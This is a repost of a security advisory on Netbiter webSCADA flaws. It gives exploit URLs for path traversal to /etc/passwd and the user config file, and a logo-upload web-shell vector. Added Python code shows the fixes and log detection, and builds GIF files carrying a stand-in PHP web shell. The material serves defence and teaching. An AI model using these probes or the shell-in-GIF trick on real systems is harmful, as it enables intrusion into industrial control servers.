Users of Netbiter webSCADA, please be advised that multiple vulnerabilities have been identified in the product.
To view these vulnerabilities, possible remedies and other advisories, see the Security Advisories page at Critical Watch (http://criticalwatch.com/support/security-advisories.aspx).
Amplify’d from www.criticalwatch.com
STANKOINFORMZASCHITA-10-01: Netbiter webSCADA multiple vulnerabilities
Vulnerability description:
1. Local file disclosure via path traversal (WASC Web Application Threat Classification: Path Traversal). The trailing %00 is a NUL byte, which terminates the filename for a C-style string and discards any suffix the script appends after the parameter:
/cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00
2. User information disclosure: the file parameter accepts an absolute path and returns the user configuration file:
/cgi-bin/read.cgi?file=/home/config/users.cfg
3. Malicious code upload via a specially crafted GIF image submitted through the logo-modification page:
/cgi-bin/read.cgi?page=config.html&file=/home/config/pages/2.conf&section=PAGE2
A web shell hidden inside the GIF data can then be used to manage the SCADA server and execute operating-system commands without authorization.
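The first two items share one root cause in read.cgi: a request parameter is used as a filename with no containment check. The following is an added example, not code from the advisory or from the vendor, that shows the vulnerable path builder, the path a C runtime would actually open for the advisory's probe, a hardened replacement, and a log check for the probe strings. The document root /home/www/pages and the sample access-log lines are assumptions constructed for the example; the real layout of the device is not given in the advisory.

```python
"""Added example (not from the advisory or the vendor): the read.cgi parameter-handling
bug class behind items 1 and 2, as a vulnerable path builder, the path a C runtime
would actually open, a hardened replacement, and an access-log check for the probes."""
import os
import re
from urllib.parse import unquote

# Assumed document root for the CGI; the real location on the device is not in the advisory.
WEBROOT = "/home/www/pages"


def naive_read_path(page: str) -> str:
    """Vulnerable pattern: decode the 'page' parameter and glue it onto the web root.
    Traversal sequences survive, and the '.html' suffix lands after the NUL byte."""
    return WEBROOT + "/" + unquote(page) + ".html"


def effective_c_path(path: str) -> str:
    """What a C-library open() would see: the string ends at the first NUL byte and
    the '..' components collapse, so the appended suffix is lost entirely."""
    return os.path.normpath(path.split("\x00", 1)[0])


def safe_read_path(name: str, webroot: str = WEBROOT) -> str:
    """Hardened replacement: refuse NUL bytes, allow-list the page name, resolve the
    result and confirm it still sits under the web root. An absolute path such as
    /home/config/users.cfg fails the allow-list; traversal fails the containment check."""
    decoded = unquote(name)
    if "\x00" in decoded:
        raise ValueError("NUL byte in page parameter")
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", decoded):
        raise ValueError("page name outside allow-list")
    root = os.path.realpath(webroot)
    candidate = os.path.realpath(os.path.join(root, decoded + ".html"))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("resolved path escapes web root")
    return candidate


REQUEST = re.compile(r'"(?:GET|POST) (\S+)')


def flag_requests(log_lines):
    """Return the access-log lines whose decoded request target carries a traversal
    sequence, a NUL byte, or a direct reference to the device's config directory."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        target = unquote(m.group(1))
        if "../" in target or "\x00" in target or "/home/config/" in target:
            hits.append(line)
    return hits


# Constructed sample log lines (Common Log Format); not captured from a real device.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2010:10:00:00 +0000] "GET /cgi-bin/read.cgi?page=index HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2010:10:00:01 +0000] "GET /cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1320',
    '10.0.0.9 - - [01/Jan/2010:10:00:02 +0000] "GET /cgi-bin/read.cgi?file=/home/config/users.cfg HTTP/1.1" 200 240',
]

if __name__ == "__main__":
    probe = "../../../../../../../../../../../etc/passwd%00"
    print("naive build   :", repr(naive_read_path(probe)))
    print("actually opens:", effective_c_path(naive_read_path(probe)))
    for param in ("index", probe, "/home/config/users.cfg"):
        try:
            print("accepted:", safe_read_path(param))
        except ValueError as err:
            print("rejected:", param, "->", err)
    for hit in flag_requests(SAMPLE_LOG):
        print("suspicious:", hit)
```

The allow-list is deliberately narrow: page names on an embedded device are a fixed set, so there is no reason to accept slashes, dots or encoded bytes at all, and the realpath containment check is kept only as a second line of defence. The log check decodes the request target before matching, so %2e%2e%2f and %00 variants are caught as well as the literal forms in the advisory.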
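For item 3, the reason a "crafted GIF" gets through is that upload handlers commonly check only the file signature. The block below is an added example, not the advisory's or the vendor's code, that builds a constructed 1x1 GIF, appends a stand-in web shell to it, and also hides the same shell inside a GIF comment extension so the file stays structurally valid. It then contrasts a signature-only check with a block walk that requires the trailer to be the last byte and refuses free-form extension blocks. The acceptance policy, the PHP-style payload string and the minimal GIF bytes are all assumptions made for the example.

```python
"""Added example (not from the advisory or the vendor): why a magic-byte check does not
stop item 3. A file that starts with a GIF signature but carries a web shell in its
trailing bytes, or inside a GIF comment block, still reads as "a GIF" to naive code."""

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")

# Constructed 1x1 GIF: header, logical screen descriptor, 2-entry colour table,
# graphic control extension, image descriptor, one LZW data sub-block, trailer.
MINIMAL_GIF = (
    b"GIF89a"
    b"\x01\x00\x01\x00\x80\x00\x00"
    b"\x00\x00\x00\xff\xff\xff"
    b"\x21\xf9\x04\x01\x00\x00\x00\x00"
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"
    b"\x02\x02\x44\x01\x00"
    b"\x3b"
)
# Constructed stand-in payload; the advisory names no specific shell.
SHELL = b"<?php system($_GET['c']); ?>"
APPENDED_SHELL_GIF = MINIMAL_GIF + SHELL
# The same shell carried in a comment extension (0x21 0xFE) inserted after the colour
# table, so every block is well-formed and the trailer is the last byte.
COMMENT_SHELL_GIF = (
    MINIMAL_GIF[:19]
    + b"\x21\xfe" + bytes([len(SHELL)]) + SHELL + b"\x00"
    + MINIMAL_GIF[19:]
)


def naive_is_gif(data: bytes) -> bool:
    """The check many upload handlers stop at: signature only."""
    return data[:6] in GIF_SIGNATURES


def _skip_sub_blocks(data: bytes, pos: int) -> int:
    """Advance past a chain of length-prefixed sub-blocks ending with a 0x00 terminator."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain")
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n


def walk_gif(data: bytes):
    """Walk the GIF block structure. Returns (trailer_offset, extension_labels) or
    raises ValueError if a block is malformed or the trailer is missing."""
    if data[:6] not in GIF_SIGNATURES or len(data) < 13:
        raise ValueError("not a GIF header")
    pos, labels = 13, []
    if data[10] & 0x80:                        # global colour table present
        pos += 3 * (2 << (data[10] & 0x07))
    while True:
        if pos >= len(data):
            raise ValueError("trailer missing")
        block = data[pos]
        if block == 0x3B:                      # trailer
            return pos, labels
        if block == 0x21:                      # extension: label byte, then sub-blocks
            if pos + 2 > len(data):
                raise ValueError("truncated extension")
            labels.append(data[pos + 1])
            pos = _skip_sub_blocks(data, pos + 2)
        elif block == 0x2C:                    # image descriptor
            if pos + 10 > len(data):
                raise ValueError("truncated image descriptor")
            lflags = data[pos + 9]
            pos += 10
            if lflags & 0x80:                  # local colour table
                pos += 3 * (2 << (lflags & 0x07))
            pos += 1                           # LZW minimum code size
            pos = _skip_sub_blocks(data, pos)
        else:
            raise ValueError("unknown block 0x%02x at offset %d" % (block, pos))


def validate_logo_gif(data: bytes) -> bool:
    """Hardened acceptance test for a logo upload (policy assumed here, not the vendor's):
    the walk must end exactly on the last byte, and comment (0xFE) or application (0xFF)
    extensions, which can carry arbitrary bytes, are refused outright."""
    try:
        trailer, labels = walk_gif(data)
    except ValueError:
        return False
    return trailer == len(data) - 1 and not ({0xFE, 0xFF} & set(labels))
```

Structural validation closes the two cheap tricks shown here, but bytes that fit inside a legitimate block (image data, for instance) can still spell out a script. The mitigation that actually removes the risk is to re-encode uploaded images with an image library and never to store them under a path that the CGI will include or the web server will execute.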